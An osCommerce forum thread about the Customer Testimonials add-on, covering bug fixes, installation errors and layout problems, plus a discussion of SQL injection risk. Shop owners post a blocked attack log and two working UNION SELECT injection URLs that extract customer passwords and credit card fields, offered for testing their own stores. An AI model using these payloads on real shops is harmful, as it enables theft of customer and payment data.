Jump to content
Sign in to follow this  
Rezolles_Net

Customer Testimonials v1.0

Recommended Posts

I found this fix for the title not showing:

icon_minus.gif Bug Fixes Again shooter-boy 19 Nov 2008 Sorry, forgot to add this one:

 

The infobox doesn't seem to display the title of the testimonial.

 

In catalog/includes/boxes/testimonials.php -

 

Find:

'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $testimonial_titulo . '</center></b><br>' . strip_tags($testimonial) . '... ' . TEXT_READ_MORE . '</a>'

 

Replace with:

 

'text' => '<a href="' . tep_href_link(FILENAME_CUSTOMER_TESTIMONIALS, tep_get_all_get_params(array('language', 'currency')) .'&testimonial_id=' . $random_testimonial['testimonials_id']) . '"><b><center>' . $random_testimonial['testimonials_title'] . '</center></b><br>' . strip_tags($testimonial) . '... ' . TEXT_READ_MORE . '</a>'

Share this post


Link to post
Share on other sites
Apparently this contribution is a major security risk because for mysql injection.

 

See this post:

http://forums.oscommerce.com/index.php?sho...t&p=1370715

 

This topic:

http://forums.oscommerce.com/index.php?sho...=328935&hl=

Now what?

Blah Blah Blah Blah Blah Blah Blah

 

You got to love it when someone posts OUTDATED information only to scare the masses.

 

If you would have noticed, this only applied to v3.1 of Customer Testimonials. It has since been addressed in the later versions. If you have an older version, then shame on you. You know what to do.

 

You would have known this if you had taken the time to view the download page and seen that this was addressed over a year ago on Feb 8, 2008.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites

Wow! Take a pill or have a beer. That's really a raw nerve you have exposed there pal.

 

Blah Blah Blah Blah Blah Blah Blah

 

You got to love it when someone posts OUTDATED information only to scare the masses.

 

If you would have noticed, this only applied to v3.1 of Customer Testimonials. It has since been addressed in the later versions. If you have an older version, then shame on you. You know what to do.

 

You would have known this if you had taken the time to view the download page and seen that this was addressed over a year ago on Feb 8, 2008.

Share this post


Link to post
Share on other sites
Wow! Take a pill or have a beer. That's really a raw nerve you have exposed there pal.

 

:lol:

 

The raw nerve is when someone who has been a member for such a long period of time such as yourself should know better than to raise such an issue before searching the forums and download area.

 

However, you are not the only one that does this as is evident from the link that you posted. :huh:

 

Hope you got your situation worked out and everything is working fine for you now.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites

Hi Bill, could you clear this up for me, I`ve looked through

 

customer_testimonials_write.php and the only sanitising I see is with tep_db_prepare_input

 

this is not sufficient to prevent an injection attack as it fails to remove quotes,

 

perhaps I missed something?

 

:huh:


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Below is one of many exploit attempts launched on customer_testimonials.php recorded by mod-security log from my server. Please note that mod-security has so far stopped the hackers but there very likely could be an exploit still available in the Testimonial contribution. Keep in mind I have only had this contribution activated for less than 24 hours.

This attack ipn resolves to bellsouth.net

 

==b4eb491c==============================

Request: www.mywesite.com 70.151.0.153 - - [19/Feb/2009:08:47:13 -0600] "GET /customer_testimonials.php?testimoni

al_id=99999+union+select+1,2,concat(customers_name,0x3a,customers_email_address,

0x3a,billing_name,0x3a,billing_

company,0x3a,billing_street_address,0x3a,billing_suburb,0x3a,billing_city,0x3a,b

illing_postcode,0x3a,billing_st

ate,0x3a,billing_country,0x3a,payment_method,0x3a,cc_type,0x3a,cc_owner,0x3a,cc_

number,0x3a,cc_expires),4,5,6,7

,8,9+from+orders HTTP/1.1" 404 1736 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/200

81217 Firefox/2.0.0.20" SZ1w8Njzn@0AAWTyfYw "-"

Handler: cgi-script

----------------------------------------

GET /customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_name,0x3a,customers_email

_address,0x3a,billing_name,0x3a,billing_company,0x3a,billing_street_address,0x3a

,billing_suburb,0x3a,billing_ci

ty,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,payment_me

thod,0x3a,cc_type,0x3a,cc_owner

,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8,9+from+orders HTTP/1.1

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Accept-Encoding: gzip,deflate

Accept-Language: en-us,en;q=0.5

Connection: keep-alive

Host: www.mywebsite.com

Keep-Alive: 300

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

mod_security-action: 404

mod_security-message: Access denied with code 404. Pattern match "select.+from" at REQUEST_URI [severity "EMERG

ENCY"]

 

HTTP/1.1 404 Condition Intercepted

Set-Cookie: Error404=1

Keep-Alive: timeout=15, max=99

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html

--b4eb491c--

Share this post


Link to post
Share on other sites
Hi Bill, could you clear this up for me, I`ve looked through

 

customer_testimonials_write.php and the only sanitising I see is with tep_db_prepare_input

 

this is not sufficient to prevent an injection attack as it fails to remove quotes,

 

perhaps I missed something?

 

:huh:

Hello Sam,

 

The customer_testimonials.php file is required and includes the sanitize code for each input.

 

I have tested the SQL injections on my test site and have found it not open to attack. Since this has been brought up again, I am now looking over each line of code to make sure it is not open to security issues.

 

********************

 

I would like to apologize to Dennisra as I probably was a little harsh regarding his alert. I didn't think there would actually be shop owners out there using the older versions of this mod. That is very dangerous and he was correct in making them aware of the possible SQL injection vulnerability.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites

Apology accepted and not a problem. I am using version 3.62.

 

I have temporarily removed the contribution until you finish a review. Below is a small portion of my server error log from today. Word sure gets around that customer_testimonials.php has been found on a server and then the break in attempts begin. This has to be done by machine as there is an attempt nearly every second.

 

This ip 38.98.120.73 is PSINet, Inc in Washington DC so these aren't Turkey or Asia originating attacks.

 

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:24 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:25 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:26 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:27 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:28 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:29 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:30 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:31 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:32 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:33 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:34 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:35 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:40 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:41 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:42 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:43 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:45 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:47 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:47 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:48 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:49 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:50 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:51 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:52 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:53 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:04:55 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:00 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:00 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:01 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:02 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:03 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:05 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:06 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:07 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:05:11 2009] [error] [client 72.30.142.221] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:14:23 2009] [error] [client 72.30.142.221] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:02 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:03 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:04 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:05 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:06 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:07 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:08 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:09 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:10 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:11 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:13 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:14 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:15 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:16 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:21 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:22 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:23 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:24 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:25 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:26 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:27 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:28 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:29 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:30 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:31 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:35 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:36 2009] [error] [client 38.98.120.73] File does not exist:

/usr/home/local/public_html/customer_testimonials.php [Thu Feb 19 19:25:36 2009] [error] [client 38.98.120.73] File does not exist:

Share this post


Link to post
Share on other sites

Hello,

 

you can test your site using these exploits:

http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

http://site.com/customer_testimonials.php?testimonial_id=null%20union%20all%20select%201,2,3,4,5,concat(customers_email_address,0x3a,customers_telephone,0x3a,cc_expires,0x3a,cc_num
ber,0x3a,cc_owner,0x3a,payment_method,0x3a,cc_type,0x3a,billing_country,0x3a,bill
ing_state,0x3a,billing_postcode,0x3a,billing_city,0x3a,billing_street_address,0x3
a,billing_company,0x3a,billing_name),7,8%20from%20orders--

 

If you see list of your customers instead of testimonials, you're at a potential risk.

 

Correct me if I'm wrong... installing Security Pro will stop these exploits and protect your site from further attacks. You can further enhance it with this security fix and automatic redirect.

 

As I said, I might be wrong but using those exploits on my site, I see no customer's details.

Edited by mr_absinthe

Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites
Hello,

 

you can test your site using these exploits:

http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

http://site.com/customer_testimonials.php?testimonial_id=null%20union%20all%20select%201,2,3,4,5,concat(customers_email_address,0x3a,customers_telephone,0x3a,cc_expires,0x3a,cc_num
ber,0x3a,cc_owner,0x3a,payment_method,0x3a,cc_type,0x3a,billing_country,0x3a,bil
l
ing_state,0x3a,billing_postcode,0x3a,billing_city,0x3a,billing_street_address,0x
3
a,billing_company,0x3a,billing_name),7,8%20from%20orders--

 

If you see list of your customers instead of testimonials, you're at a potential risk.

 

Correct me if I'm wrong... installing Security Pro will stop these exploits and protect your site from further attacks. You can further enhance it with this security fix and automatic redirect.

 

As I said, I might be wrong but using those exploits on my site, I see no customer's details.

 

Customer Testimonials v4.0 IS NOT vulnerable to those exploits above, even without the extra security add-ons installed. My test site is a stock osC RC2a with CTv4.0 only.

 

I also tested using other known exploits with the same results (passed).

 

The only addition to CTv4.0 that is recommended is mentioned in the installation text of the download and that would be to install the image validation for extra security but this is not installed on my test site.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites

I'm NOT saying that your version IS vulnerable, I just wanted to help those people that have installed previous versions since no help was posted, yet. There might be various reasons for not updating completely to the latest version of testimonials (or any other contribution) and deleting customer_testimonials.php is not an option for many store owners. It would be nice to provide a code that could fix and secure any previous versions - we've seen similar ways to fix quite a few other contributions. If I was familiar with this contribution, I would have posted that fix/code.


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites
I found the errors solutions, please don't read the topic above !! ;)

 

Fatal error: Call to undefined function tep_set_TESTIMONIALS_status() in /home/faimports/www/loja/admin/testimonials_manager.php on line 14

 

Hi how you fix this since i get the same problem as yours? thanks heaps

 

regards,

jal

Share this post


Link to post
Share on other sites
I'm NOT saying that your version IS vulnerable, I just wanted to help those people that have installed previous versions since no help was posted, yet. There might be various reasons for not updating completely to the latest version of testimonials (or any other contribution) and deleting customer_testimonials.php is not an option for many store owners. It would be nice to provide a code that could fix and secure any previous versions - we've seen similar ways to fix quite a few other contributions. If I was familiar with this contribution, I would have posted that fix/code.

 

 

Yeah, Alex, I totally understood where you were coming from regarding the testing of the SQL injections.

 

By the way, the fix has been posted for quite sometime in the Customer Testimonials download page for those that do not wish to upgrade. Upgrading is quite easy though since most of the updates are to the native customer testimonial files anyway (New Files folder).


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites

My problem is.

 

Fatal error: Class 'upload' not found in /home/web/public_html/customer_testimonials_write.php on line 28

 

 

is line

 

if(!is_dir(DIR_WS_IMAGES . 'testimonials'))mkdir(DIR_WS_IMAGES . 'testimonials', '777');

 

$testimonial_image = new upload('testimonial_image');

$testimonial_image->set_destination(DIR_WS_IMAGES . 'testimonials/');

if ($testimonial_image->parse() && $testimonial_image->save()) {

$testimonial_image_name = $testimonial_image->filename;

}

 

The archive upload.php is in the folder.

 

Than'ks for help.

Share this post


Link to post
Share on other sites
My problem is.

 

Fatal error: Class 'upload' not found in /home/web/public_html/customer_testimonials_write.php on line 28

 

 

is line

 

 

 

The archive upload.php is in the folder.

 

Than'ks for help.

 

Hello Lucas,

 

Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution.

 

You may also be missing the testimonials folder in your image directory.

 

Note: This contribution uploads an additional upload.php file that is seaparate from the original stock upload.php file that is in the admin side. The new upload.php file is in the catalog side to allow customers to upload an image from the frontend.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites
Hello Lucas,

 

Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution.

 

You may also be missing the testimonials folder in your image directory.

 

Note: This contribution uploads an additional upload.php file that is seaparate from the original stock upload.php file that is in the admin side. The new upload.php file is in the catalog side to allow customers to upload an image from the frontend.

 

Hi Thank's for respot,

 

The archive upload.php in this folder classes in direcotry catalog/includes/classes/ .

 

The folder image/testimonials is creat .

 

 

I do not understand this information

"Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution."

 

I check what(wich) files?? upload.php ??

Share this post


Link to post
Share on other sites
Hi Thank's for respot,

 

The archive upload.php in this folder classes in direcotry catalog/includes/classes/ .

 

The folder image/testimonials is creat .

 

 

I do not understand this information

"Check your files using a file comparison tool such as Beyond Compare or WinMerge against the files from the contribution."

 

I check what(wich) files?? upload.php ??

To find where you made your mistake in the installation a lot faster and easier would be to use a file comparison utility.

 

Beyond Compare allows you to compare all of the files and folders from one directory (such as your shop) with all of the files and folders of another directory (such as the files included in the contribution). What this will do is show you where you may have uploaded a file/folder to the wrong location or if you did a manual installation, it would show you where you may have misplaced some code.

 

Once you found your mistake, you could simply "merge" in the changes to make the files in sync with each other.

 

Do a search for Beyond Compare on Google and you will get more details on this very useful tool.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites

Installed script and it functions exactly as it should...LOVE IT!! Thanks!....only problem is with page formatting.

 

Having problems with <table> codings in customer_testimonials_write.php.

 

I have STS installed and half a dozen other mods...this is the only one that throws the right column out of whack. Just spent the last four hours searching for the missing...or extra <table> (or more likely </table>)...thought I found it, but still doesn't format correctly.

 

I got the submit form formatted, but now after a user submits a testimonial the success page is messed up.

 

Anyone having similar issues? Suggestions?

Edited by gordo942

Share this post


Link to post
Share on other sites
Installed script and it functions exactly as it should...LOVE IT!! Thanks!....only problem is with page formatting.

 

Having problems with <table> codings in customer_testimonials_write.php.

 

I have STS installed and half a dozen other mods...this is the only one that throws the right column out of whack. Just spent the last four hours searching for the missing...or extra <table> (or more likely </table>)...thought I found it, but still doesn't format correctly.

 

I got the submit form formatted, but now after a user submits a testimonial the success page is messed up.

 

Anyone having similar issues? Suggestions?

I'll take a look and see if I can duplicate your issue. You may simply need to create a template for this script and set the table widths there.


Bill Kellum

 

Sounds Good Productions

STS Tutorials & more: STSv4.6, STS Add-ons (STS Power Pack), STS V4 Forum STS Forum FREE TEMPLATE

Share this post


Link to post
Share on other sites
I'll take a look and see if I can duplicate your issue. You may simply need to create a template for this script and set the table widths there.

 

well...I got a fix...it's not pretty but works.

 

Added another </td></tr></table> at line 266 before <?php } ?> to fix formatting on the the form. And commented out </td></tr> and the line after <!-- body_text_eof //--> to fix formatting for the success screen.

Share this post


Link to post
Share on other sites

Another question...

 

I have my infoboxes formatted by STS and on the Testimonial page, each testimonial is listed in a separate infobox...just makes the page look a little busy. Any way to have them listed in just a simple table with a border and not an infobox?

Share this post


Link to post
Share on other sites

First, Thank you for this contirb. This worked great for me out of the box. Of course I was hoping to get some help now that I seem to have messed it up with some other contrib. (no clue which one)

 

My customers_testimonials.php page now shows this error at the bottom...

Fatal error: Cannot redeclare preorder() (previously declared in /....html/includes/boxes/categories.php:17) in /..../html/includes/boxes/categories.php on line 48

 

Since all my other pages seem to be working I thought someone might have a clue where to look?

 

 

My categories lines 33-53 look like this..

 

// Traverse category tree- this is for older snapshots pre-November 2002
/*    foreach ($foo as $key => $value) {
     if ($foo[$key]['parent'] == $cid) {
//        print "$key, $level, $cid, $cpath<br>";
       preorder($key, $level+1, $foo, ($level != 0 ? $cpath . $cid . '_' : ''))
;
     } */
// Function used for post November 2002 snapshots
 function tep_show_category($counter) {
   global $foo, $categories_string, $id;

   for ($a=0; $a<$foo[$counter]['level']; $a++) {
     $categories_string .= "  ";
   }
   }
 }


//////////
// Display box heading
//////////

 

 

I have re-installed customer_testimonials and compared the exiting files with no luck so far.

 

 

p.s. keep up the awsome work.

Share this post


Link to post
Share on other sites
First, Thank you for this contirb. This worked great for me out of the box. Of course I was hoping to get some help now that I seem to have messed it up with some other contrib. (no clue which one)

 

My customers_testimonials.php page now shows this error at the bottom...

Fatal error: Cannot redeclare preorder() (previously declared in /....html/includes/boxes/categories.php:17) in /..../html/includes/boxes/categories.php on line 48

 

Since all my other pages seem to be working I thought someone might have a clue where to look?

 

 

My categories lines 33-53 look like this..

 

// Traverse category tree- this is for older snapshots pre-November 2002
/*    foreach ($foo as $key => $value) {
     if ($foo[$key]['parent'] == $cid) {
//        print "$key, $level, $cid, $cpath<br>";
       preorder($key, $level+1, $foo, ($level != 0 ? $cpath . $cid . '_' : ''))
;
     } */
// Function used for post November 2002 snapshots
 function tep_show_category($counter) {
   global $foo, $categories_string, $id;

   for ($a=0; $a<$foo[$counter]['level']; $a++) {
     $categories_string .= "  ";
   }
   }
 }


//////////
// Display box heading
//////////

 

 

I have re-installed customer_testimonials and compared the exiting files with no luck so far.

Also tried changining the code to bypass like this with no luck

 

// Traverse category tree- this is for older snapshots pre-November 2002
/*    foreach ($foo as $key => $value) {
     if ($foo[$key]['parent'] == $cid) {
//        print "$key, $level, $cid, $cpath<br>";
       preorder($key, $level+1, $foo, ($level != 0 ? $cpath . $cid . '_' : ''))
;
     } 
// Function used for post November 2002 snapshots
 function tep_show_category($counter) {
   global $foo, $categories_string, $id;

   for ($a=0; $a<$foo[$counter]['level']; $a++) {
     $categories_string .= "  ";
   } */
   }

 

 

p.s. keep up the awsome work.

Share this post


Link to post
Share on other sites
Another question...

 

I have my infoboxes formatted by STS and on the Testimonial page, each testimonial is listed in a separate infobox...just makes the page look a little busy. Any way to have them listed in just a simple table with a border and not an infobox?

 

:blink: Any thoughts? Anyone? :blink:

Edited by gordo942

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×